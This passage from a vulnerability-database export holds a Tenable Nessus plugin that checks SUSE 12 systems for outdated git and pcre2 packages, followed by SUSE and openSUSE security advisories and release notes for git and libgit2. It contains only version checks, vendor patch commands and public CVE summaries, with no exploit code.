(bsc#1038395)\n\nChanges in pcre2: Include the libraries, development and tools\npackages.\n\ngit uses only libpcre2-8 so far, but this allows further application\nusage of pcre2.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1167890\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1168930\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.opensuse.org/opensuse-factory/2019-01/msg00490.html\");\n # https://raw.github.com/git/git/master/Documentation/RelNotes/2.16.0.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9a796f1e\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-5260/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20200992-1/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d199ff91\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud Crowbar 8:zypper in -t patch\nSUSE-OpenStack-Cloud-Crowbar-8-2020-992=1\n\nSUSE OpenStack Cloud 8:zypper in -t patch\nSUSE-OpenStack-Cloud-8-2020-992=1\n\nSUSE OpenStack Cloud 7:zypper in -t patch\nSUSE-OpenStack-Cloud-7-2020-992=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP5:zypper in -t\npatch SUSE-SLE-SDK-12-SP5-2020-992=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP4:zypper in -t\npatch SUSE-SLE-SDK-12-SP4-2020-992=1\n\nSUSE Linux Enterprise Server for SAP 12-SP3:zypper in 
-t patch\nSUSE-SLE-SAP-12-SP3-2020-992=1\n\nSUSE Linux Enterprise Server for SAP 12-SP2:zypper in -t patch\nSUSE-SLE-SAP-12-SP2-2020-992=1\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2020-992=1\n\nSUSE Linux Enterprise Server 12-SP5:zypper in -t patch\nSUSE-SLE-SERVER-12-SP5-2020-992=1\n\nSUSE Linux Enterprise Server 12-SP4:zypper in -t patch\nSUSE-SLE-SERVER-12-SP4-2020-992=1\n\nSUSE Linux Enterprise Server 12-SP3-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2020-992=1\n\nSUSE Linux Enterprise Server 12-SP3-BCL:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-BCL-2020-992=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-2020-992=1\n\nSUSE Linux Enterprise Server 12-SP2-BCL:zypper in -t patch\nSUSE-SLE-SERVER-12-SP2-BCL-2020-992=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2020-992=1\n\nSUSE Enterprise Storage 5:zypper in -t patch SUSE-Storage-5-2020-992=1\n\nHPE Helion Openstack 8:zypper in -t patch\nHPE-Helion-OpenStack-8-2020-992=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-19604\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2019-1353\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git HTTP Server For CVE-2018-17456');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/10/14\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-core-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:git-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpcre2-16\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpcre2-16-0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpcre2-32\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpcre2-32-0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpcre2-8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpcre2-8-0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpcre2-posix2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libpcre2-posix2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! 
preg(pattern:\"^(1|2|3|4|5)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1/2/3/4/5\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"git-core-2.26.0-27.27.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"git-core-debuginfo-2.26.0-27.27.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"git-debugsource-2.26.0-27.27.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libpcre2-16-0-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libpcre2-16-0-debuginfo-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libpcre2-32-0-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libpcre2-32-0-debuginfo-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libpcre2-8-0-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libpcre2-8-0-debuginfo-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libpcre2-posix2-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"libpcre2-posix2-debuginfo-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"git-core-2.26.0-27.27.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"git-core-debuginfo-2.26.0-27.27.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"git-debugsource-2.26.0-27.27.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libpcre2-16-0-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libpcre2-16-0-debuginfo-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libpcre2-32-0-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libpcre2-32-0-debuginfo-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", 
reference:\"libpcre2-8-0-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libpcre2-8-0-debuginfo-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libpcre2-posix2-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libpcre2-posix2-debuginfo-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"git-core-2.26.0-27.27.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"git-core-debuginfo-2.26.0-27.27.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"git-debugsource-2.26.0-27.27.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libpcre2-16-0-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libpcre2-16-0-debuginfo-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libpcre2-32-0-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libpcre2-32-0-debuginfo-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libpcre2-8-0-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libpcre2-8-0-debuginfo-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libpcre2-posix2-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libpcre2-posix2-debuginfo-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"git-core-2.26.0-27.27.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"git-core-debuginfo-2.26.0-27.27.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"git-debugsource-2.26.0-27.27.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libpcre2-16-0-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libpcre2-16-0-debuginfo-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", 
reference:\"libpcre2-32-0-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libpcre2-32-0-debuginfo-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libpcre2-8-0-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libpcre2-8-0-debuginfo-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libpcre2-posix2-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libpcre2-posix2-debuginfo-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"git-core-2.26.0-27.27.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"git-core-debuginfo-2.26.0-27.27.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"git-debugsource-2.26.0-27.27.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libpcre2-16-0-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libpcre2-16-0-debuginfo-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libpcre2-32-0-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libpcre2-32-0-debuginfo-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libpcre2-8-0-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libpcre2-8-0-debuginfo-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libpcre2-posix2-10.34-1.3.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"5\", reference:\"libpcre2-posix2-debuginfo-10.34-1.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 9.3, "vector": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2018-08-25T01:33:23", "description": "This update for libgit2 to version 0.26.5 fixes the following issues:\n\n The following security vulnerabilities were addressed:\n\n - CVE-2018-10887: Fixed an integer overflow which in turn leads to an out\n of bound read, allowing to read the base object, which could be\n exploited by an attacker to cause denial of service (DoS) (bsc#1100613).\n - CVE-2018-10888: Fixed an out-of-bound read while reading a binary delta\n file, which could be exploited by an attacker t ocause a denial of\n service (DoS) (bsc#1100612).\n - CVE-2018-11235: Fixed a remote code execution, which could occur with a\n crafted .gitmodules file (bsc#1095219)\n - CVE-2018-15501: Prevent out-of-bounds reads when processing\n smart-protocol "ng" packets (bsc#1104641)\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n", "cvss3": {}, "published": "2018-08-25T00:07:49", "type": "suse", "title": "Security update for libgit2 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2018-10888", "CVE-2018-11235", "CVE-2018-10887", "CVE-2018-15501"], "modified": "2018-08-25T00:07:49", "id": "OPENSUSE-SU-2018:2502-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-08/msg00074.html", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-27T02:31:29", "description": "This update for libgit2 fixes the following issues:\n\n - CVE-2018-8099: Fixed possible denial of service attack via different\n vectors by not being able to differentiate between these status codes\n (bsc#1085256).\n - CVE-2018-11235: With a crafted .gitmodules file, a malicious project can\n execute an arbitrary script on a machine that runs "git clone\n --recurse-submodules" because submodule "names" are obtained from this\n file, and then appended to $GIT_DIR/modules, leading to directory\n traversal with "../" in a name. 
Finally, post-checkout hooks from a\n submodule are executed, bypassing the intended design in which hooks are\n not obtained from a remote server. (bsc#1095219)\n - CVE-2018-10887: It has been discovered that an unexpected sign extension\n in git_delta_apply function in delta.c file may have lead to an integer\n overflow which in turn leads to an out of bound read, allowing to read\n before the base object. An attacker could have used this flaw to leak\n memory addresses or cause a Denial of Service. (bsc#1100613)\n - CVE-2018-10888: A missing check in git_delta_apply function in delta.c\n file, may lead to an out-of-bound read while reading a binary delta\n file. An attacker may use this flaw to cause a Denial of Service.\n (bsc#1100612)\n - CVE-2018-15501: A remote attacker can send a crafted smart-protocol "ng"\n packet that lacks a '\\0' byte to trigger an out-of-bounds read that\n leads to DoS. (bsc#1104641)\n\n This update was imported from the SUSE:SLE-12-SP2:Update update project.\n\n", "cvss3": {}, "published": "2018-10-27T00:24:13", "type": "suse", "title": "Security update for libgit2 (moderate)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2018-10888", "CVE-2018-11235", "CVE-2018-10887", "CVE-2018-15501", "CVE-2018-8099"], "modified": "2018-10-27T00:24:13", "id": "OPENSUSE-SU-2018:3519-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-10/msg00078.html", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-06-06T04:42:39", "description": "This update for fixes the following security issues:\n\n * path sanity-checks on NTFS can read arbitrary memory (CVE-2018-11233,\n boo#1095218)\n * arbitrary code execution when recursively cloning a malicious repository\n (CVE-2018-11235, boo#1095219)\n\n", "cvss3": {}, "published": "2018-06-06T03:06:59", "type": "suse", "title": "Security update for git (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": 
["CVE-2018-11235", "CVE-2018-11233"], "modified": "2018-06-06T03:06:59", "id": "OPENSUSE-SU-2018:1553-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-06/msg00004.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-30T18:26:12", "description": "An update that solves 15 vulnerabilities and has 8 fixes is\n now available.\n\nDescription:\n\n This update for git fixes the following issues:\n\n Security issues fixed:\n\n * CVE-2020-11008: Specially crafted URLs may have tricked the credentials\n helper to providing credential information that is not appropriate for\n the protocol in use and host being contacted (bsc#1169936)\n\n git was updated to 2.26.1 (bsc#1169786, jsc#ECO-1628, bsc#1149792)\n\n - Fix git-daemon not starting after conversion from sysvinit to systemd\n service (bsc#1169605).\n\n * CVE-2020-5260: Specially crafted URLs with newline characters could have\n been used to make the Git client to send credential information for a\n wrong host to the attacker's site bsc#1168930\n\n git 2.26.0 (bsc#1167890, jsc#SLE-11608):\n\n * \"git rebase\" now uses a different backend that is based on the 'merge'\n machinery by default. 
The 'rebase.backend' configuration variable\n reverts to old behaviour when set to 'apply'\n * Improved handling of sparse checkouts\n * Improvements to many commands and internal features\n\n git 2.25.2:\n\n * bug fixes to various subcommands in specific operations\n\n git 2.25.1:\n\n * \"git commit\" now honors advise.statusHints\n * various updates, bug fixes and documentation updates\n\n git 2.25.0\n\n * The branch description (\"git branch --edit-description\") has been used\n to fill the body of the cover letters by the format-patch command; this\n has been enhanced so that the subject can also be filled.\n * A few commands learned to take the pathspec from the standard input\n or a named file, instead of taking it as the command line arguments,\n with the \"--pathspec-from-file\" option.\n * Test updates to prepare for SHA-2 transition continues.\n * Redo \"git name-rev\" to avoid recursive calls.\n * When all files from some subdirectory were renamed to the root\n directory, the directory rename heuristics would fail to detect that as\n a rename/merge of the subdirectory to the root directory, which has been\n corrected.\n * HTTP transport had possible allocator/deallocator mismatch, which has\n been corrected.\n\n git 2.24.1:\n\n * CVE-2019-1348: The --export-marks option of fast-import is exposed also\n via the in-stream command feature export-marks=... 
and it allows\n overwriting arbitrary paths (bsc#1158785)\n * CVE-2019-1349: on Windows, when submodules are cloned recursively, under\n certain circumstances Git could be fooled into using the same Git\n directory twice (bsc#1158787)\n * CVE-2019-1350: Incorrect quoting of command-line arguments allowed\n remote code execution during a recursive clone in conjunction with SSH\n URLs (bsc#1158788)\n * CVE-2019-1351: on Windows mistakes drive letters outside of the\n US-English alphabet as relative paths (bsc#1158789)\n * CVE-2019-1352: on Windows was unaware of NTFS Alternate Data Streams\n (bsc#1158790)\n * CVE-2019-1353: when run in the Windows Subsystem for Linux while\n accessing a working directory on a regular Windows drive, none of the\n NTFS protections were active (bsc#1158791)\n * CVE-2019-1354: on Windows refuses to write tracked files with filenames\n that contain backslashes (bsc#1158792)\n * CVE-2019-1387: Recursive clones vulnerability that is caused by too-lax\n validation of submodule names, allowing very targeted attacks via remote\n code execution in recursive clones (bsc#1158793)\n * CVE-2019-19604: a recursive clone followed by a submodule update could\n execute code contained within the repository without the user explicitly\n having asked for that (bsc#1158795)\n\n git 2.24.0\n\n * The command line parser learned \"--end-of-options\" notation.\n * A mechanism to affect the default setting for a (related) group of\n configuration variables is introduced.\n * \"git fetch\" learned \"--set-upstream\" option to help those who first\n clone from their private fork they intend to push to, add the true\n upstream via \"git remote add\" and then \"git fetch\" from it.\n * fixes and improvements to UI, workflow and features, bash completion\n fixes\n\n git 2.23.0:\n\n * The \"--base\" option of \"format-patch\" computed the patch-ids for\n prerequisite patches in an unstable way, which has been updated to\n compute in a way that is compatible with 
\"git patch-id\n --stable\".\n * The \"git log\" command by default behaves as if the --mailmap\n option was given.\n * fixes and improvements to UI, workflow and features\n\n git 2.22.1\n\n * A relative pathname given to \"git init --template=<path> <repo>\"\n ought to be relative to the directory \"git init\" gets invoked in, but it\n instead was made relative to the repository, which has been corrected.\n * \"git worktree add\" used to fail when another worktree connected to the\n same repository was corrupt, which has been corrected.\n * \"git am -i --resolved\" segfaulted after trying to see a commit as if it\n were a tree, which has been corrected.\n * \"git merge --squash\" is designed to update the working tree and the\n index without creating the commit, and this cannot be countermanded by\n adding the \"--commit\" option; the command now refuses to work when both\n options are given.\n * Update to Unicode 12.1 width table.\n * \"git request-pull\" learned to warn when the ref we ask them to pull from\n in the local repository and in the published repository are different.\n * \"git fetch\" into a lazy clone forgot to fetch base objects that are\n necessary to complete delta in a thin packfile, which has been corrected.\n * The URL decoding code has been updated to avoid going past the end\n of the string while parsing %-<hex>-<hex> sequence.\n * \"git clean\" silently skipped a path when it cannot lstat() it; now it\n gives a warning.\n * \"git rm\" to resolve a conflicted path leaked an internal message \"needs\n merge\" before actually removing the path, which was confusing. This has\n been corrected.\n * Many more bugfixes and code cleanups.\n\n - removal of SuSEfirewall2 service, since SuSEfirewall2 has been replaced\n by firewalld.\n\n - partial fix for git instaweb giving 500 error (bsc#1112230)\n\n git 2.22.0\n\n * The filter specification \"--filter=sparse:path=<path>\" used to create a\n lazy/partial clone has been removed. 
Using a blob that is part of the\n project as sparse specification is still supported with the\n \"--filter=sparse:oid=<blob>\" option\n * \"git checkout --no-overlay\" can be used to trigger a new mode of\n checking out paths out of the tree-ish, that allows paths that match the\n pathspec that are in the current index and working tree and are not in\n the tree-ish.\n * Four new configuration variables {author,committer}.{name,email} have\n been introduced to override user.{name,email} in more specific cases.\n * \"git branch\" learned a new subcommand \"--show-current\".\n * The command line completion (in contrib/) has been taught to complete\n more subcommand parameters.\n * The completion helper code now pays attention to repository-local\n configuration (when available), which allows --list-cmds to honour a\n repository specific setting of completion.commands, for example.\n * The list of conflicted paths shown in the editor while concluding a\n conflicted merge was shown above the scissors line when the clean-up\n mode is set to \"scissors\", even though it was commented\n out just like the list of updated paths and other information to help\n the user explain the merge better.\n * \"git rebase\" that was reimplemented in C did not set ORIG_HEAD\n correctly, which has been corrected.\n * \"git worktree add\" used to do a \"find an available name with stat and\n then mkdir\", which is race-prone. This has been fixed by using mkdir and\n reacting to EEXIST in a loop.\n\n - Move to DocBook 5.x. Asciidoctor 2.x no longer supports the legacy\n DocBook 4.5 format.\n\n - update git-web AppArmor profile for bash and tar usrMerge (bsc#1132350)\n\n git 2.21.0\n\n * Historically, the \"-m\" (mainline) option can only be used for \"git\n cherry-pick\" and \"git revert\" when working with a merge commit. This\n version of Git no longer warns or errors out when working with a\n single-parent commit, as long as the argument to the \"-m\" option is 1\n (i.e. 
it has only one parent, and the request is to pick or revert\n relative to that first parent). Scripts that relied on the behaviour may\n get broken with this change.\n * Small fixes and features for fast-export and fast-import.\n * The \"http.version\" configuration variable can be used with recent enough\n versions of cURL library to force the version of HTTP used to talk when\n fetching and pushing.\n * \"git push $there $src:$dst\" rejects when $dst is not a fully qualified\n refname and it is not clear what the end user meant.\n * Update \"git multimail\" from the upstream.\n * A new date format \"--date=human\" that morphs its output depending\n on how far the time is from the current time has been introduced.\n \"--date=auto:human\" can be used to use this new format (or any existing\n format) when the output is going to the pager or to the terminal, and\n otherwise the default format.\n\n - Fix worktree creation race (bsc#1114225).\n - add shadow build dependency to the -daemon subpackage.\n\n\n git 2.20.1:\n\n * portability fixes\n * \"git help -a\" did not work well when an overly long alias was defined\n * no longer squelched an error message when the run_command API failed to\n run a missing command\n\n git 2.20.0\n\n * \"git help -a\" now gives verbose output (same as \"git help -av\"). Those\n who want the old output may say \"git help --no-verbose -a\"..\n * \"git send-email\" learned to grab address-looking string on any trailer\n whose name ends with \"-by\".\n * \"git format-patch\" learned new \"--interdiff\" and \"--range-diff\"\n options to explain the difference between this version and the previous\n attempt in the cover letter (or after the three-dashes as a comment).\n * Developer builds now use -Wunused-function compilation option.\n * Fix a bug in which the same path could be registered under multiple\n worktree entries if the path was missing (for instance, was removed\n manually). 
Also, as a convenience, expand the number of cases in which\n --force is applicable.\n * The overly large Documentation/config.txt file has been split into\n a million little pieces. This potentially allows each individual piece to\n be included into the manual page of the command it affects more easily.\n * Malformed or crafted data in packstream can make our code attempt to\n read or write past the allocated buffer and abort, instead of reporting\n an error, which has been fixed.\n * Fix for a long-standing bug that leaves the index file corrupt when it\n shrinks during a partial commit.\n * \"git merge\" and \"git pull\" that merges into an unborn branch used to\n completely ignore \"--verify-signatures\", which has been corrected.\n * ...and much more features and fixes\n\n git 2.19.2:\n\n * various bug fixes for multiple subcommands and operations\n\n git 2.19.1:\n\n * CVE-2018-17456: Specially crafted .gitmodules files may have allowed\n arbitrary code execution when the repository is cloned with\n --recurse-submodules (bsc#1110949)\n\n git 2.19.0:\n\n * \"git diff\" compares the index and the working tree. For paths added\n with intent-to-add bit, the command shows the full contents\n of them as added, but the paths themselves were not marked as new\n files. They are now shown as new by default.\n * \"git apply\" learned the \"--intent-to-add\" option so that an\n otherwise working-tree-only application of a patch will add new paths to\n the index marked with the \"intent-to-add\" bit.\n * \"git grep\" learned the \"--column\" option that gives not just the line\n number but the column number of the hit.\n * The \"-l\" option in \"git branch -l\" is an unfortunate short-hand for\n \"--create-reflog\", but many users, both old and new, somehow expect it\n to be something else, perhaps \"--list\".
This step warns when \"-l\" is\n used as a short-hand for \"--create-reflog\" and warns about the future\n repurposing of it when it is used.\n * The userdiff pattern for .php has been updated.\n * The content-transfer-encoding of the message \"git send-email\" sends\n out by default was 8bit, which can cause trouble when there is an\n overlong line to bust RFC 5322/2822 limit. A new option 'auto' to\n automatically switch to quoted-printable when there is such a line in\n the payload has been introduced and is made the default.\n * \"git checkout\" and \"git worktree add\" learned to honor\n checkout.defaultRemote when auto-vivifying a local branch out of a\n remote tracking branch in a repository with multiple remotes that have\n tracking branches that share the same names. (merge 8d7b558bae\n ab/checkout-default-remote later to maint).\n * \"git grep\" learned the \"--only-matching\" option.\n * \"git rebase --rebase-merges\" mode now handles octopus merges as well.\n * Add a server-side knob to skip commits in exponential/fibonacci stride\n in an attempt to cover wider swath of history with a smaller number of\n iterations, potentially accepting a larger packfile transfer, instead of\n going back one commit a time during common ancestor discovery during the\n \"git fetch\" transaction. (merge 42cc7485a2 jt/fetch-negotiator-skipping\n later to maint).\n * A new configuration variable core.usereplacerefs has been added,\n primarily to help server installations that want to ignore the replace\n mechanism altogether.\n * Teach \"git tag -s\" etc.
a few configuration variables (gpg.format that\n can be set to \"openpgp\" or \"x509\", and gpg.<format>.program that is used\n to specify what program to use to deal with the format) to allow x.509\n certs with CMS via \"gpgsm\" to be used instead of\n openpgp via \"gnupg\".\n * Many more strings are prepared for l10n.\n * \"git p4 submit\" learns to ask its own pre-submit hook if it should\n continue with submitting.\n * The test performed at the receiving end of \"git push\" to prevent bad\n objects from entering repository can be customized via receive.fsck.*\n configuration variables; we now have gained a counterpart to do the same\n on the \"git fetch\" side, with fetch.fsck.* configuration variables.\n * \"git pull --rebase=interactive\" learned \"i\" as a short-hand for\n \"interactive\".\n * \"git instaweb\" has been adjusted to run better with newer Apache on\n RedHat based distros.\n * \"git range-diff\" is a reimplementation of \"git tbdiff\" that lets us\n compare individual patches in two iterations of a topic.\n * The sideband code learned to optionally paint selected keywords at the\n beginning of incoming lines on the receiving end.\n * \"git branch --list\" learned to take the default sort order from the\n 'branch.sort' configuration variable, just like \"git tag --list\" pays\n attention to 'tag.sort'.\n * \"git worktree\" command learned \"--quiet\" option to make it less verbose.\n\n git 2.18.0:\n\n * improvements to rename detection logic\n * When built with more recent cURL, GIT_SSL_VERSION can now specify\n \"tlsv1.3\" as its value.\n * \"git mergetools\" learned talking to 